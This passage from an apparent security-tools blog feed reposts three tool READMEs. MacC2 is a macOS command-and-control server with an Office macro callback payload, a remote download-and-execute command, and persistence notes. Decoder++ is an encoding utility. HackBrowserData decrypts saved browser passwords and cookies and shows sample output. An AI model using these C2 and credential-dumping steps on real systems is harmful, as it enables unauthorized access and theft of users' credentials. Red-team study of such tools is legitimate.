<li><code>chmod +x setup.sh</code></li> <li><code>sudo ./setup.sh</code> <strong>(this will create an untrusted ssl cert and key, generate a macro file for the server and port you specify (will drop the macro in macro.txt locally), build macc2-docker, and run the MacC2 server inside of macc2-container in interactive mode)</strong></li> <li>when prompted, enter the IP/hostname of the MacC2 server<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-MAV0U_iK_10/X7H2rSM8l3I/AAAAAAAAUXc/x474QsCjtWAiMQ-mI7exVmLPwU4C0cruwCNcBGAsYHQ/s868/MacC2_1_pic30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="90" data-original-width="868" height="66" src="https://1.bp.blogspot.com/-MAV0U_iK_10/X7H2rSM8l3I/AAAAAAAAUXc/x474QsCjtWAiMQ-mI7exVmLPwU4C0cruwCNcBGAsYHQ/w640-h66/MacC2_1_pic30.png" width="640" /></a></div><br /></li> <li>when prompted, enter the port that the MacC2 server will listen on<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-UqUZV0Ftguw/X7H2zv2ZueI/AAAAAAAAUXk/gsCfBkj-CIsXVatcxcXTYbj0A5gcYDqgQCNcBGAsYHQ/s956/MacC2_2_pic31.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="92" data-original-width="956" height="62" src="https://1.bp.blogspot.com/-UqUZV0Ftguw/X7H2zv2ZueI/AAAAAAAAUXk/gsCfBkj-CIsXVatcxcXTYbj0A5gcYDqgQCNcBGAsYHQ/w640-h62/MacC2_2_pic31.png" width="640" /></a></div><br /></li> <li>A hex encoded macro payload will be dropped locally in a file named macro.txt that is configured to connect to your MacC2 server on the hostname/IP and port you specified.<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-EB9AoLNq6TY/X7H25Ssu52I/AAAAAAAAUXo/0zI9wuOfaNkBYcJ123Wub7a_cCL5PxZewCNcBGAsYHQ/s2942/MacC2_3_pic32.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="2942" height="54" src="https://1.bp.blogspot.com/-EB9AoLNq6TY/X7H25Ssu52I/AAAAAAAAUXo/0zI9wuOfaNkBYcJ123Wub7a_cCL5PxZewCNcBGAsYHQ/w640-h54/MacC2_3_pic32.png" width="640" /></a></div><br /></li> <li>Docker will install the aiohttp python3 dependency, build macc2-docker, and will run the MacC2 Server in a container named macc2-container. Once finished the MacC2 server will listen on the specified port:<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-_ofTmNU5olk/X7H2-Mne8nI/AAAAAAAAUXw/K223yxss2xIJMohbFpo-GVZzmKBTCmIIwCNcBGAsYHQ/s2048/MacC2_4_pic33.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="2048" height="156" src="https://1.bp.blogspot.com/-_ofTmNU5olk/X7H2-Mne8nI/AAAAAAAAUXw/K223yxss2xIJMohbFpo-GVZzmKBTCmIIwCNcBGAsYHQ/w640-h156/MacC2_4_pic33.png" width="640" /></a></div><br /></li> <li>You can run <em>docker ps</em> and validate that the MacC2 server is running (you will see a container named macc2-container listed there)</li> </ol> <p><strong>Note: Since I am using a static container name (macc2-container), if you run this setup more than once on the same server, you will need to delete the macc2-container name after each use or else you will get an error "The container name "/macc2-container" is already in use by container". You can run the command below to delete the macc2-container after each run:</strong></p> <blockquote> <p>docker rm macc2-container</p> </blockquote> <p>You can then either copy the MacC2_client.py file over to the client and execute for a callback or you can import the macro.txt macro into an Office document and "Enable Macros" when opening for a callback on the client.</p> <br /><span style="font-size: large;"><b>Running Locally (Without Using Docker)</b></span><br /> <p>If you opt to not use docker, you can set up the server locally using the steps below:</p> <p>Since the MacC2 server uses the aiohttp library for communications, you will need to install aiohttp first:</p> <p><code>pip install aiohttp</code> <strong>(if you encounter an error ensure that pip is pointing to python3, since aiohttp is a python3 library)</strong>:</p> <p><code>python3 -m pip install --upgrade --force pip</code></p> <p><strong><em>On C2 Server:</em></strong></p> <ol> <li>Set up ssl (note: use a key size of at least 2048)</li> </ol> <p>If you do not have your own cert, you can use the following to generate a self signed cert:</p> <ul> <li> 1: <code>openssl req -new -newkey rsa:2048 -nodes -out ca.csr -keyout ca.key</code> </li> <li> 2: <code>openssl x509 -trustout -signkey ca.key -days 365 -req -in ca.csr -out ca.pem</code> </li> </ul> <p><strong>note: the server script is hard-coded to use ca.pem and ca.key, so keep these names the same for now, or change the code appropriately</strong></p> <ol start="2"> <li>Use macro_generator.py to create the MacC2 scripts with the server's IP/domain and port. macro_generator.py also builds a macro (macro.txt) that uses hex encoding to run MacC2. You can copy and paste the contents of macro.text into an MS Office document:</li> </ol> <p>Usage:</p> <p><code>python3 macro_generatory.py -s [C2 Server IP/domain] -p [C2 Server Port]</code></p> <p>-Example:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FHKiE7MZ6dQ/X7H3DQjK-gI/AAAAAAAAUX4/KVh3XWohHlgKLbMHvTg8ZaUn3dUpwoCfQCNcBGAsYHQ/s2724/MacC2_5_pic3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="404" data-original-width="2724" height="94" src="https://1.bp.blogspot.com/-FHKiE7MZ6dQ/X7H3DQjK-gI/AAAAAAAAUX4/KVh3XWohHlgKLbMHvTg8ZaUn3dUpwoCfQCNcBGAsYHQ/w640-h94/MacC2_5_pic3.png" width="640" /></a></div><p><br /></p> <ol start="3"> <li>Start the generated MacC2_server.py script to listen for a connection:</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FGM52djRFGQ/X7H3as61pQI/AAAAAAAAUYI/kwAbTlUAUzUrpGJenr8BKcJrKCBBBTg8wCNcBGAsYHQ/s1500/MacC2_6_pic4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="328" data-original-width="1500" height="140" src="https://1.bp.blogspot.com/-FGM52djRFGQ/X7H3as61pQI/AAAAAAAAUYI/kwAbTlUAUzUrpGJenr8BKcJrKCBBBTg8wCNcBGAsYHQ/w640-h140/MacC2_6_pic4.png" width="640" /></a></div><p><br /></p> <p><strong><em>On <a href="https://www.kitploit.com/search/label/Client%20Side" target="_blank" title="Client Side">Client Side</a> (the target mac host):</em></strong></p> <ol> <li> If you desire to not be limited by the mac sandbox and want more functionality, you may opt to copy the MacC2_client.py script to the client (assuming you have access). </li> <li> On the client, run the MacC2_client.py script: <code>python MacC2_client.py</code></li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-eW1GZ8IqkRI/X7H3gch7nwI/AAAAAAAAUYM/unHnYT9exr4_eh8PpfReprYcMm8dy_WyACNcBGAsYHQ/s912/MacC2_7_pic5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="58" data-original-width="912" height="40" src="https://1.bp.blogspot.com/-eW1GZ8IqkRI/X7H3gch7nwI/AAAAAAAAUYM/unHnYT9exr4_eh8PpfReprYcMm8dy_WyACNcBGAsYHQ/w640-h40/MacC2_7_pic5.png" width="640" /></a></div><p><br /></p> <ol start="3"> <li>On the server, you will see an inbound connection. Example below:</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-sIhzQ1-CYhA/X7H3mkRbytI/AAAAAAAAUYQ/pwDJMo_AkA4MjzZyIt74DJ4Oid9_rFPpACNcBGAsYHQ/s1508/MacC2_8_pic6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="1508" height="138" src="https://1.bp.blogspot.com/-sIhzQ1-CYhA/X7H3mkRbytI/AAAAAAAAUYQ/pwDJMo_AkA4MjzZyIt74DJ4Oid9_rFPpACNcBGAsYHQ/w640-h138/MacC2_8_pic6.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Using MacC2</b></span><br /> <p>After you receive a connection, you can use the "help" command on the server to get a list of built-in commands available. You can enter one of these commands. After entering a command and pressing Enter, the command is queued up (allows you to enter multiple commands to be executed by the client). Once you type "done" and hit Enter, all of the queued commands will be sent to the client for execution.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JmJ4ZhiNKl4/X7H3tKIU_PI/AAAAAAAAUYY/hqhqLL1fKkE_LdCtOa25uDNQq16pKwSvwCNcBGAsYHQ/s3289/MacC2_9_pic7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="956" data-original-width="3289" height="186" src="https://1.bp.blogspot.com/-JmJ4ZhiNKl4/X7H3tKIU_PI/AAAAAAAAUYY/hqhqLL1fKkE_LdCtOa25uDNQq16pKwSvwCNcBGAsYHQ/w640-h186/MacC2_9_pic7.png" width="640" /></a></div><p> </p> <p>Each command is pretty straightforward. The command options that are not OPSEC safe (i.e., command line executions or cause pop ups) are also flagged in red from the help menu.</p> <p>Functions of Note:</p> <ul> <li>You can generate a Mythic C2 JXA .js payload, download it, and host it on a remote server. Then you can provide the url to the hosted file to MacC2 using the <strong>runjxa</strong> command to have MacC2 download and execute the Mythic .JXA payload:</li> </ul> <p><code>>>> runjxa <url_to_JXA_.js_payload></code></p> <p><strong>Note: If you gain access using the MS Office macro, then the persistence method will not work due to sandboxing. The files will still be dropped and the login item will still be inserted but upon reboot the quarantine attribute prevents the persistence from executing</strong></p> <br /><span style="font-size: large;"><b>Additional Info</b></span><br /> <p>The MacC2 server uses aiohttp to easily allow for asynchronous web comms. To ensure that only MacC2 agents can access the server, the server includes the following:</p> <ul> <li> A specific user agent string check (if a request fails this check it receives a 404 Not Found) </li> <li> A specific token (if a request failes this check it receives a 404 Not Found) </li> </ul> <p>The operator flow after setting everything up and getting a callback is:</p> <ul> <li> view help menu for command options </li> <li> enter command name and press enter for each command you want to run </li> <li> enter "done" and press enter to have the queued commands sent to the client for execution </li> <li> <strong>NOTE: The default sleep is 10 seconds. The operator can change that by using the sleep [numberofseconds] command.</strong> </li> <li> NOTE: The MacC2 server currently does not have a way to conveniently switch between sessions when multiple clients connect. Instead the server auto switches between sessions after each command executed. So the operator will need to pay attention to the IP in the connection to know which session is being interacted with. </li> </ul> <br /><span style="font-size: large;"><b>Macro Limitations</b></span><br /> <p>MacC2 does NOT include any sandbox escapes and therefore all functions do not work when access is gained via the Office macro. Functions that DO work from the sandbox include:</p> <ul> <li> runjxa </li> <li> systeminfo </li> <li> persist: MacC2 can drop files to disk from a sandboxed macro payload. However, upon reboot the persistence will not execute due to the quarantine attribue on the dropped files. </li> <li> addresses </li> <li> prompt </li> <li> clipboard </li> <li> shell (not OPSEC safe) </li> <li> spawn (not OPSEC safe) </li> <li> cd and listdir (sandbox prevents access for most directories but you can see the root '/' directory and potentially others as well)</p></li></ul><div><br /></div> <p><strong><em>DISCLAIMER</em></strong></p> <p>This is for academic purposes and should not be used maliciously or without the appropriate authorizations and approvals.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cedowens/MacC2" rel="nofollow" target="_blank" title="Download MacC2">Download MacC2</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-44365873344312759892020-10-26T08:30:00.001-03:002020-10-26T08:30:00.128-03:00Decoder++ - An Extensible Application For Penetration Testers And Software Developers To Decode/Encode Data Into Various Formats<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-tugJ5j1-b8Y/X5ZOjWLd1AI/AAAAAAAAUKo/e2DcfbuJt4I6ycRCRVZtomCkq8SmTZZ6ACNcBGAsYHQ/s238/decoder-plus-plus_1_dpp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="208" data-original-width="238" height="349" src="https://1.bp.blogspot.com/-tugJ5j1-b8Y/X5ZOjWLd1AI/AAAAAAAAUKo/e2DcfbuJt4I6ycRCRVZtomCkq8SmTZZ6ACNcBGAsYHQ/w400-h349/decoder-plus-plus_1_dpp.png" width="400" /></a></div><p><br /></p> <p>An extensible application for penetration testers and software developers to decode/encode data into various formats.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Setup</b></span><br /> <p><code>Decoder++</code> can be either installed by using <code>pip</code> or by pulling the source from this repository:</p> <div><pre><code># Install using pip<br />pip3 install decoder-plus-plus</code></pre></div> <br /><span style="font-size: large;"><b>Overview</b></span><br /> <p>This section provides you with an overview about the individual ways of interacting with <code>Decoder++</code>. For additional usage information check out the <code>Advanced Usage</code> section.</p> <br /><b>Graphical User Interface</b><br /> <p>If you prefer a graphical user interface to transform your data <code>Decoder++</code> gives you two choices: a <code>main-window-mode</code> and a <code>dialog-mode</code>.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-qpoZ0HEQhfg/X5ZOrjMNfuI/AAAAAAAAUKs/luaRO52XsVEHs3ZwjCq5tAEhqhfpXw0pQCNcBGAsYHQ/s1224/decoder-plus-plus_2_dpp-preview-001.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="835" data-original-width="1224" height="436" src="https://1.bp.blogspot.com/-qpoZ0HEQhfg/X5ZOrjMNfuI/AAAAAAAAUKs/luaRO52XsVEHs3ZwjCq5tAEhqhfpXw0pQCNcBGAsYHQ/w640-h436/decoder-plus-plus_2_dpp-preview-001.png" width="640" /></a></div><p> </p> <p>While the <code>main-window-mode</code> supports tabbing, the <code>dialog-mode</code> has the ability to return the transformed content to <code>stdout</code> ready for further processing. This comes quite in handy if you want to call <code>Decoder++</code> from other tools like BurpSuite (check out the <a href="https://github.com/bytebutcher/burp-send-to" rel="nofollow" target="_blank" title="BurpSuite Send-to extension">BurpSuite Send-to extension</a>) or any other script in which you want to add a graphical user interface for flexible transformation of any input.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1SF2ubtN_RQ/X5ZOx6rwglI/AAAAAAAAUKw/8NhUy0q8XeMn6OfoWcLEcDiI3ZrAVx1QwCNcBGAsYHQ/s1220/decoder-plus-plus_3_dpp-preview-dialog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="839" data-original-width="1220" height="440" src="https://1.bp.blogspot.com/-1SF2ubtN_RQ/X5ZOx6rwglI/AAAAAAAAUKw/8NhUy0q8XeMn6OfoWcLEcDiI3ZrAVx1QwCNcBGAsYHQ/w640-h440/decoder-plus-plus_3_dpp-preview-dialog.png" width="640" /></a></div><p><br /></p><b>Command Line</b><br /> <p>If you don't want to startup a graphical user interface but still make use of the various transformation methods of <code>Decoder++</code> you can use the <a href="https://www.kitploit.com/search/label/Commandline" target="_blank" title="commandline">commandline</a> mode:</p> <div><pre><code>$ python3 dpp.py -e base64 -h sha1 "Hello, world!"<br />e52d74c6d046c390345ae4343406b99587f2af0d</code></pre></div> <br /><b>Features</b><br /> <ul> <li>User Interfaces: <ul> <li>Graphical User Interface</li> <li>Command Line Interface</li> </ul> </li> <li>Preinstalled <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="Scripts">Scripts</a> and Codecs: <ul> <li><strong>Encode/Decode:</strong> Base16, Base32, Base64, Binary, Gzip, Hex, Html, JWT, HTTP64, Octal, Url, Url+, Zlib</li> <li><strong>Hashing:</strong> Adler-32, Apache-Md5, CRC32, FreeBSD-NT, Keccak224, Keccak256, Keccak384, Keccak512, LM, Md2, Md4, Md5, NT, PHPass, RipeMd160, Sha1, Sha3 224, Sha3 256, Sha3 384, Sha3 512, Sha224, Sha256, Sha348, Sha512, Sun Md5</li> <li><strong>Scripts:</strong> CSS-Minify, Caesar, Filter-Lines, Identify File Format, Identify Hash Format, JS-Beautifier, JS-to-XML, HTML-Beautifier, Little/Big-Endian Transform, Reformat Text, Remove Newlines, Remove Whitespaces, Search and Replace, Split and Rejoin, Unescape/Escape String</li> </ul> </li> <li>Smart-Decode</li> <li>Plugin System</li> <li>Load & Save Current Session</li> <li>Platforms: <ul> <li>Windows</li> <li>Linux</li> <li>MAC</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>Advanced Usage</b></span><br /> <p>This section provides you with additional information about how the <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> interface and interactive python shell can be used.</p> <br /><b>Command Line Interface</b><br /> <p>The commandline interface gives you easy access to all available codecs.</p> <p>To list them you can use the <code>-l</code> argument. To narrow down your search the <code>-l</code> argument accepts additional parameters which are used as filter:</p> <div><pre><code>$ dpp -l base enc<br /><br />Codec Type<br />----- ----<br />base16 encoder<br />base32 encoder<br />base64 encoder<br /></code></pre></div> <p><code>Decoder++</code> distinguishes between encoders, decoders, hashers and scripts. Like the graphical user interface the command line interface allows you to use multiple codecs in a row:</p> <div><pre><code>$ dpp "H4sIAAXmeVsC//NIzcnJ11Eozy/KSVEEAObG5usNAAAA" -d base64 -d gzip<br />Hello, world!</code></pre></div> <p>While encoders, decoders and hashers can be used right away, some of the scripts may require additional configuration. To show all available options of a specific script you can add the <code>help</code> parameter:</p> <pre><code>$ dpp "Hello, world!" -s split_and_rejoin help<br /><br />Split & Rejoin<br />==============<br /><br /> Name Value Group Required Description<br /> ---- ----- ----- -------- -----------<br /> split_by_chars split_behaviour yes the chars used at which to split the text<br /> split_by_length 0 split_behaviour yes the length used at which to split the text<br />rejoin_with_chars yes the chars used to join the splitted text<br /><br /></code></pre> <p>To configure a specific script you need to supply the individual options as name-value pairs (e.g. <code>search_term="Hello"</code>):</p> <pre><code>$ dpp "Hello, world!" -s search_and_replace search_term="Hello" replace_term="Hey"<br />Hey, world!<br /></code></pre> <br /><b>Plugin Development</b><br /> <p>To add custom codecs just copy them into the <code>$HOME/.config/dpp/plugins/</code> folder.</p> <div><pre><code>from dpp.core.plugin.abstract_plugin import DecoderPlugin<br /><br />class Plugin(DecoderPlugin):<br /> """<br /> Possible plugins are DecoderPlugin, EncoderPlugin, HasherPlugin or ScriptPlugin.<br /> See AbstractPlugin or it's implementations for more information.<br /> """ <br /><br /> def __init__(self, context):<br /> plugin_name = "URL"<br /> plugin_author = "Your Name"<br /> # Python Libraries which are required to be able to execute the run method of this plugin.<br /> plugin_requirements = ["urllib"]<br /> super().__init__(plugin_name, plugin_author, plugin_requirements)<br /><br /> def run(self, text):<br /> # Load the required libraries here ...<br /> import urllib.parse<br /> # Run your action ...<br /> return urllib.parse.unquote(text)</code></pre></div> <br /><span style="font-size: large;"><b>Contribute</b></span><br /> <p>Feel free to open a new ticket for any feature request or bugs. Also don't hesitate to issue a pull-requests for new features/plugins.</p> <p>Thanks to</p> <ul> <li>Tim Menapace (RIPEMD160, KECCAK256)</li> <li>Robin Krumnow (ROT13)</li> </ul> <br /><span style="font-size: large;"><b>Troubleshooting</b></span><br /> <br /><b>Signals are not working on Mac OS</b><br /> <p>When starting <code>Decoder++</code> in Mac OS signals are not working.</p> <p>This might happen when <code>PyQt5</code> is installed using homebrew. To fix this issue it is recommended to install the <code>libdbus-1</code> library. See <a href="http://doc.qt.io/qt-5/osx-issues.html#d-bus-and-macos" rel="nofollow" target="_blank" title="http://doc.qt.io/qt-5/osx-issues.html#d-bus-and-macos">http://doc.qt.io/qt-5/osx-issues.html#d-bus-and-macos</a> for more information regarding this issue.</p> <br /><b>Can not start Decoder++ in <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> using CygWin</b><br /> <p>When starting <code>Decoder++</code> in <code>CygWin</code> an error occurs:</p> <pre><code> ModuleNotFoundError: No module named 'PyQt5'<br /></code></pre> <p>This happens although <code>PyQt5</code> is installed using pip. Currently there is no fix for that. Instead it is recommended to start <code>Decoder++</code> using the Windows command line.</p> <br /><span style="font-size: large;"><b>Inspired By</b></span><br /> <ul> <li>PortSwigger's Burp Decoder</li> </ul> <br /><span style="font-size: large;"><b>Powered By</b></span><br /> <ul> <li>PyQt5</li> <li>QtAwesome</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/bytebutcher/decoder-plus-plus" rel="nofollow" target="_blank" title="Download Decoder-Plus-Plus">Download Decoder-Plus-Plus</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-73951456097936981892020-10-16T08:30:00.014-03:002020-10-16T08:30:07.595-03:00HackBrowserData - Decrypt Passwords/Cookies/History/Bookmarks From The Browser<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-DDvJRMpvhKU/X4UxwUWiH4I/AAAAAAAAUB4/wxSbas_tJCMG-Mq2oSLEO3_TZJwvjXdzQCNcBGAsYHQ/s853/HackBrowserData.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="448" data-original-width="853" height="336" src="https://1.bp.blogspot.com/-DDvJRMpvhKU/X4UxwUWiH4I/AAAAAAAAUB4/wxSbas_tJCMG-Mq2oSLEO3_TZJwvjXdzQCNcBGAsYHQ/w640-h336/HackBrowserData.png" width="640" /></a></div><p><br /></p><p></p> <p>hack-browser-data is an open-source tool that could help you decrypt data (passwords / bookmarks / cookies / history) from the browser. It supports the most popular <a href="https://www.kitploit.com/search/label/Browsers" target="_blank" title="browsers">browsers</a> on the market and runs on Windows, macOS and Linux.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Supported Browser</b></span><br /> <br /><b>Windows</b><br /> <table> <tbody><tr> <th align="left">Browser</th> <th align="center">Password</th> <th align="center">Cookie</th> <th align="center">Bookmark</th> <th align="center">History</th> </tr> <tr> <td align="left">Google Chrome</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Firefox</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Microsoft Edge</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">360 Speed Browser</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">QQ Browser</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Internet Explorer</td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> </tr> </tbody></table> <br /><b>MacOS</b><br /> <p>Based on Apple's security policy, some browsers <strong>require a current user password</strong> to decrypt.</p> <table> <tbody><tr> <th align="left">Browser</th> <th align="center">Password</th> <th align="center">Cookie</th> <th align="center">Bookmark</th> <th align="center">History</th> </tr> <tr> <td align="left">Google Chrome</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Firefox</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Microsoft Edge</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Safari</td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> </tr> </tbody></table> <br /><b>Linux</b><br /> <table> <tbody><tr> <th align="left">Browser</th> <th align="center">Password</th> <th align="center">Cookie</th> <th align="center">Bookmark</th> <th align="center">History</th> </tr> <tr> <td align="left">Firefox</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Google Chrome</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Install</b></span><br /> <p>Installation of hack-browser-data is dead-simple, just download <a href="https://github.com/moonD4rk/HackBrowserData/releases" rel="nofollow" target="_blank" title="the release for your system">the release for your system</a> and run the binary.</p> <br /><b>Building from source</b><br /> <p>support <code>go 1.11+</code></p> <div><pre><code>git clone https://github.com/moonD4rk/HackBrowserData<br /><br />cd HackBrowserData<br /><br />go get -v -t -d ./...<br /><br />go build</code></pre></div> <br /><b>Cross compile</b><br /> <p>Need install target OS's <code>gcc</code> library, here's an example of use <code>Mac</code> building for <code>Windows</code> and <code>Linus</code></p> <p><strong>Windows</strong></p> <div><pre><code>brew install mingw-w64<br /><br />CGO_ENABLED=1 GOOS=windows GOARCH=amd64 CC="x86_64-w64-mingw32-gcc" go build</code></pre></div> <p><strong>Linux</strong></p> <div><pre><code>brew install FiloSottile/musl-cross/musl-cross<br /><br />CC=x86_64-linux-musl-gcc CXX=x86_64-linux-musl-g++ GOARCH=amd64 GOOS=linux CGO_ENABLED=1 go build -ldflags "-linkmode external -extldflags -static"</code></pre></div> <br /><b>Run</b><br /> <p>You can double-click to run, or use command line.</p> <pre><code>PS C:\test> .\hack-browser-data.exe -h<br />NAME:<br /> hack-browser-data - Export passwords/cookies/history/bookmarks from browser<br />USAGE:<br /> [hack-browser-data -b <a href="https://www.kitploit.com/search/label/Chrome" target="_blank" title="chrome">chrome</a> -f <a href="https://www.kitploit.com/search/label/JSON" target="_blank" title="json">json</a> -dir results -cc]<br /> Get all data(password/cookie/history/bookmark) from chrome<br />VERSION:<br /> 0.2.3<br />GLOBAL OPTIONS:<br /> --verbose, --vv Verbose (default: false)<br /> --compress, --cc Compress result to zip (default: false)<br /> --browser value, -b value Available browsers: all|edge|firefox|chrome (default: "all")<br /> --results-dir value, --dir value Export dir (default: "results")<br /> --format value, -f value Format, csv|json|console (default: "json")<br /> --help, -h show help (default: false)<br /> --version, -v print the version (default: false)<br /><br />PS C:\test> .\hack-browser-data.exe -b all -f json --dir results -cc<br />[x]: Get 44 cookies, filename is results/microsoft_edge_cookie.json<br />[x]: Get 54 history, filename is results/microsoft_edge_history.json<br />[x]: Get 1 passwords, filename is results/microsoft_edge_password.json<br />[x]: Get 4 bookmarks, filename is results/microsoft_edge_bookmark.json<br />[x]: Get 6 bookmarks, filename is results/360speed_bookmark.json<br />[x]: Get 19 cookies, filename is results/360speed_cookie.json<br />[x]: Get 18 history, filename is results/360speed_history.json<br />[x]: Get 1 passwords, filename is results/360speed_password.json<br />[x]: Get 12 history, filename is results/qq_history.json<br />[x]: Get 1 passwords, filename is results/qq_password.json<br />[x]: Get 12 bookmarks, filename is results/qq_bookmark.json<br />[x]: Get 14 cookies, filename is results/qq_cookie.json<br />[x]: Get 28 bookmarks, fi lename is results/firefox_bookmark.json<br />[x]: Get 10 cookies, filename is results/firefox_cookie.json<br />[x]: Get 33 history, filename is results/firefox_history.json<br />[x]: Get 1 passwords, filename is results/firefox_password.json<br />[x]: Get 1 passwords, filename is results/chrome_password.json<br />[x]: Get 4 bookmarks, filename is results/chrome_bookmark.json<br />[x]: Get 6 cookies, filename is results/chrome_cookie.json<br />[x]: Get 6 history, filename is results/chrome_history.json<br />[x]: Compress success, zip filename is results/archive.zip<br /></code></pre> <br /><span style="font-size: large;"><b>TODO</b></span><br /> <p><a href="https://gs.statcounter.com/browser-market-share/desktop/worldwide" rel="nofollow" target="_blank" title="Desktop Browser Market Share Worldwide">Desktop Browser Market Share Worldwide</a></p> <table><tbody><tr> <th align="center">Chrome</th> <th align="center">Safari</th> <th align="center">Firefox</th> <th align="center">Edge Legacy</th> <th align="center">IE</th> <th align="center">Other</th> </tr> <tr> <td align="center">68.33%</td> <td align="center">9.4%</td> <td align="center">8.91%</td> <td align="center">4.41%</td> <td align="center">3%</td> <td align="center">3%</td> </tr> </tbody></table> <p><a href="https://gs.statcounter.com/browser-market-share/desktop/china" rel="nofollow" target="_blank" title="Desktop Browser Market Share China">Desktop Browser Market Share China</a></p> <table> <tbody><tr> <th align="left">Chrome</th> <th align="center">360 Safe</th> <th align="center">Firefox</th> <th align="center">QQ Browser</th> <th align="center">IE</th> <th align="center">Sogou Explorer</th> </tr> <tr> <td align="left">39.85%</td> <td align="center">22.26%</td> <td align="center">9.28%</td> <td align="center">6.5%</td> <td align="center">5.65%</td> <td align="center">4.74%</td> </tr> </tbody></table> <ul class="contains-task-list"> <li class="task-list-item">Chrome</li> <li class="task-list-item">QQ browser</li> <li class="task-list-item">Edge</li> <li class="task-list-item">360 speed browser</li> <li class="task-list-item">Firefox</li> <li class="task-list-item">Safari</li> <li class="task-list-item">IE</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/moonD4rk/HackBrowserData" rel="nofollow" target="_blank" title="Download HackBrowserData">Download HackBrowserData</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-69750470062041195912020-10-14T08:30:00.008-03:002020-10-14T08:30:09.172-03:00MEDUZA - A More Or Less Universal SSL Unpinning Tool For iOS<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-TLGeEX7NEgg/X4Uqjd5FibI/AAAAAAAAUBQ/3VnK57T0_FkuF2kfY4D5LgU0xRTs6O6kgCNcBGAsYHQ/s2048/MEDUZA_2_mitmpoxy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1129" data-original-width="2048" height="352" 